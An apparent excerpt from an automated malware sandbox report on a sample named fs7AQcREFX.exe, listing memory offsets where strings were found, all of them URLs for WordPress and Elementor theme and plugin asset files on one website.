00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/jet-elements/assets/css/jet-elements-skin.css?ver=2.6.9
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/jet-elements/assets/css/jet-elements.css?ver=2.6.9
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/jet-elements/assets/js/jet-elements.min.js?ver=2.6.9
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/jet-elements/assets/js/lib/slick/slick.min.js?ver=1.8.1
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/premium-addons-for-elementor/assets/frontend/min-js/headro
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/premium-addons-for-elementor/assets/frontend/min-js/lottie
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/premium-addons-for-elementor/assets/frontend/min-js/premiu
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/themes/hello-elementor-child/ctc-style.css?ver=2.7.1.1683646291
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/themes/hello-elementor/assets/js/hello-frontend.min.js?ver=1.0.0
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/themes/hello-elementor/style.min.css?ver=2.7.1
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/themes/hello-elementor/theme.min.css?ver=2.7.1
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/uploads/elementor/css/custom-jet-blocks.css?ver=1.3.5
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/uploads/elementor/css/global.css?ver=1685016035
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/uploads/elementor/css/post-11.css?ver=1685016036
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/uploads/elementor/css/post-1395.css?ver=1685016036
